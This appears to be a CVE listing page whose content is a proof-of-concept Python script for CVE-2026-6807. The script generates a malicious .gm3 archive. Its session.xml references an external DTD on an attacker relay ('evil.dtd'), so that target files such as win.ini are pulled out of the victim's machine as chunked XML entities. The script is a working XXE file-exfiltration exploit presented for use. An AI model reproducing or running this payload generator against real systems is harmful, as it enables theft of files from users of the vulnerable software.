5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-6807
README.md
Rendering markdown...
POC / gen_payload.py PY
⬇ Raw GitHub ✕ Close 
"""
Generates malicious.gm3 for CVE-2026-6807.
Target file path is passed to the relay via ?t= in the DTD URL.
The relay reads the file server-side and serves back chunked general entities.
"""
import zipfile, base64, argparse, urllib.parse, os

DEFAULT_HOST   = "127.0.0.1"
DEFAULT_PORT   = 7778
DEFAULT_TARGET = "C:/windows/win.ini"
DEFAULT_OUTPUT = "malicious.gm3"
MAX_CHUNK      = 150

parser = argparse.ArgumentParser(description="CVE-2026-6807 payload generator")
parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help="File to exfiltrate on the victim")
parser.add_argument("--host",         default=DEFAULT_HOST,   help="Relay listener host")
parser.add_argument("--port", type=int, default=DEFAULT_PORT, help="Relay listener port")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT, help="Output .gm3 path")
args = parser.parse_args()

# Read target locally to calculate chunk count for entity refs in session.xml
try:
    with open(args.target.replace("/", os.sep), "rb") as f:
        raw = f.read()
    encoded = base64.b64encode(raw).decode()
    chunks  = [encoded[i:i+MAX_CHUNK] for i in range(0, len(encoded), MAX_CHUNK)]
    n = len(chunks)
    print(f"[*] {args.target}: {len(raw)} bytes -> {n} chunks")
except FileNotFoundError:
    # Target may not exist locally (remote engagement) — ask for chunk count
    n = int(input(f"[?] Target not found locally. How many chunks to expect? "))

encoded_path = urllib.parse.quote(args.target, safe="")
dtd_url      = f"http://{args.host}:{args.port}/evil.dtd?t={encoded_path}"

entity_refs  = "\n  ".join(f"&c{i};" for i in range(n))
session_xml  = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE session SYSTEM "{dtd_url}">
<session>
  {entity_refs}
</session>
"""

manifest_xml = '<?xml version="1.0" encoding="UTF-8"?>\n<manifest ver="3.2"/>\n'
stub         = '<?xml version="1.0" encoding="UTF-8"?>\n<stub/>\n'

with zipfile.ZipFile(args.output, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("manifest.xml", manifest_xml)
    zf.writestr("session.xml",  session_xml)
    zf.writestr("logical.xml",  stub)
    zf.writestr("physical.xml", stub)
    zf.writestr("mesh.xml",     stub)

print(f"[+] Written {args.output} ({n} entity refs -> {dtd_url})")